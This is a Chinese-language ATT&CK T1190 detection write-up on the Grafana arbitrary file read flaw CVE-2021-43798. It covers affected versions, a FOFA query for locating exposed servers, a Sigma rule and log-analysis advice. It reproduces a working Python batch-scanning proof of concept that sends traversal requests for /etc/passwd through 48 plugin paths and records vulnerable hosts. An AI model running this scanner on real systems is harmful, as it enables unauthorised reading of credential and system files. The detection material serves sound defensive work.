T1190-CVE-2021-43798 Grafana 任意文件读取漏洞
来自ATT&CK的描述
使用软件,数据或命令来利用面向Internet的计算机系统或程序中的弱点,从而导致意外或无法预期的行为。系统的弱点可能是错误、故障或设计漏洞。这些应用程序通常是网站,但是可以包括数据库(例如SQL),标准服务(例如SMB 或SSH)以及具有Internet可访问开放的任何其他应用程序,例如Web服务器和相关服务。根据所利用的缺陷,这可能包括“利用防御防卫”。
如果应用程序托管在基于云的基础架构上,则对其进行利用可能会导致基础实际应用受到损害。这可以使攻击者获得访问云API或利用弱身份和访问管理策略的路径。
对于网站和数据库,OWASP排名前10位和CWE排名前25位突出了最常见的基于Web的漏洞。
测试案例
Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。Grafana 存在未授权任意文件读取漏洞,攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件。
影响范围:Grafana 8.0.0-beta1 to 8.3.0
FOFa查询语句:app="Grafana"
检测日志
HTTP.log
测试复现
漏洞利用方式建议参考:Grafana未授权任意文件读取漏洞
https://www.cnblogs.com/bflw/p/15659188.html
具体POC可参考:
# coding:utf-8
# Author:绯夜 By T00ls.Net
import requests,urllib3
import urllib.request
import ssl
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
requests.packages.urllib3.disable_warnings()
urls = open('url.txt')
headers = {
'User-Agent':"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
}
for i in urls:
url = i.rstrip("\n")
list = ['/public/plugins/alertGroups/../../../../../../../../etc/passwd',
'/public/plugins/alertlist/../../../../../../../../etc/passwd',
'/public/plugins/alertmanager/../../../../../../../../etc/passwd',
'/public/plugins/annolist/../../../../../../../../etc/passwd',
'/public/plugins/barchart/../../../../../../../../etc/passwd',
'/public/plugins/bargauge/../../../../../../../../etc/passwd',
'/public/plugins/canvas/../../../../../../../../etc/passwd',
'/public/plugins/cloudwatch/../../../../../../../../etc/passwd',
'/public/plugins/dashboard/../../../../../../../../etc/passwd',
'/public/plugins/dashlist/../../../../../../../../etc/passwd',
'/public/plugins/debug/../../../../../../../../etc/passwd',
'/public/plugins/elasticsearch/../../../../../../../../etc/passwd',
'/public/plugins/gauge/../../../../../../../../etc/passwd',
'/public/plugins/geomap/../../../../../../../../etc/passwd',
'/public/plugins/gettingstarted/../../../../../../../../etc/passwd',
'/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd',
'/public/plugins/grafana/../../../../../../../../etc/passwd',
'/public/plugins/graph/../../../../../../../../etc/passwd',
'/public/plugins/graphite/../../../../../../../../etc/passwd',
'/public/plugins/heatmap/../../../../../../../../etc/passwd',
'/public/plugins/histogram/../../../../../../../../etc/passwd',
'/public/plugins/influxdb/../../../../../../../../etc/passwd',
'/public/plugins/jaeger/../../../../../../../../etc/passwd',
'/public/plugins/live/../../../../../../../../etc/passwd',
'/public/plugins/logs/../../../../../../../../etc/passwd',
'/public/plugins/loki/../../../../../../../../etc/passwd',
'/public/plugins/mixed/../../../../../../../../etc/passwd',
'/public/plugins/mssql/../../../../../../../../etc/passwd',
'/public/plugins/mysql/../../../../../../../../etc/passwd',
'/public/plugins/news/../../../../../../../../etc/passwd',
'/public/plugins/nodeGraph/../../../../../../../../etc/passwd',
'/public/plugins/opentsdb/../../../../../../../../etc/passwd',
'/public/plugins/piechart/../../../../../../../../etc/passwd',
'/public/plugins/pluginlist/../../../../../../../../etc/passwd',
'/public/plugins/postgres/../../../../../../../../etc/passwd',
'/public/plugins/prometheus/../../../../../../../../etc/passwd',
'/public/plugins/stat/../../../../../../../../etc/passwd',
'/public/plugins/state-timeline/../../../../../../../../etc/passwd',
'/public/plugins/status-history/../../../../../../../../etc/passwd',
'/public/plugins/table-old/../../../../../../../../etc/passwd',
'/public/plugins/table/../../../../../../../../etc/passwd',
'/public/plugins/tempo/../../../../../../../../etc/passwd',
'/public/plugins/testdata/../../../../../../../../etc/passwd',
'/public/plugins/text/../../../../../../../../etc/passwd',
'/public/plugins/timeseries/../../../../../../../../etc/passwd',
'/public/plugins/welcome/../../../../../../../../etc/passwd',
'/public/plugins/xychart/../../../../../../../../etc/passwd',
'/public/plugins/zipkin/../../../../../../../../etc/passwd',]
for i in list:
urls = url +i
try:
try:
request = urllib.request.urlopen(urls,timeout=8)
content = request.read().decode('utf-8')
except:
request = urllib.request.urlopen(urls, context=ssl._create_unverified_context(),timeout=8)
content = request.read().decode('utf-8')
if 'root:x:0:0:root' in content:
print("[+] Sussess "+urls)
result = urls+"==>Success"
with open("Success.txt", "a+") as a:
a.write(result + '\n')
break
except:
print("[*] Failed")
测试留痕
暂未进行实际有效的测试,故引用他人测试数据信息。 https://blog.riskivy.com/wp-content/uploads/2021/12/md-1.png
检测规则/思路
Sigma规则
建议使用HTTP流量+安全设备进行检测分析判断攻击是否成功。
title: CVE-2021-43798 Grafana 任意文件读取漏洞
status: experimental
description: Grafana 存在未授权任意文件读取漏洞,攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件。
references:
- https://saucer-man.com/information_security/856.html
author: 12306Br0
date: 2021/12/09
tags:
- attack.initial_access
- attack.t1190
logsource:
category: webserver
detection:
selection:
cs-method: 'GET'
c-uri|contains|all:
- '/../../../../../../../../'
- '/public/plugins'
condition: selection
fields:
- c-ip
- c-dns
falsepositives:
- Unknown
level: critical
建议
观察请求包与响应报内容。如请求路径中包含/etc/passwd,代表攻击者尝试读取/etc/passwd下密码信息,如响应状态码为200,且响应包中包含root:x:0:0:root,意味着攻击成功;如请求路径中包含/var/lib/grafana/grafana.db,代表攻击者尝试读取数据库文件,如果响应状态码为200,且响应包z中包含SQLite format,很意味着攻击成功。
参考推荐
MITRE-ATT&CK-T1190
https://attack.mitre.org/techniques/T1190/
Grafana 未授权任意文件读取漏洞
https://www.cnblogs.com/bflw/p/15659188.html
CVE-2021-43798 Grafana 任意文件读取漏洞分析
https://saucer-man.com/information_security/856.html
朴实无华的Grafana未授权任意文件读取漏洞批量验证脚本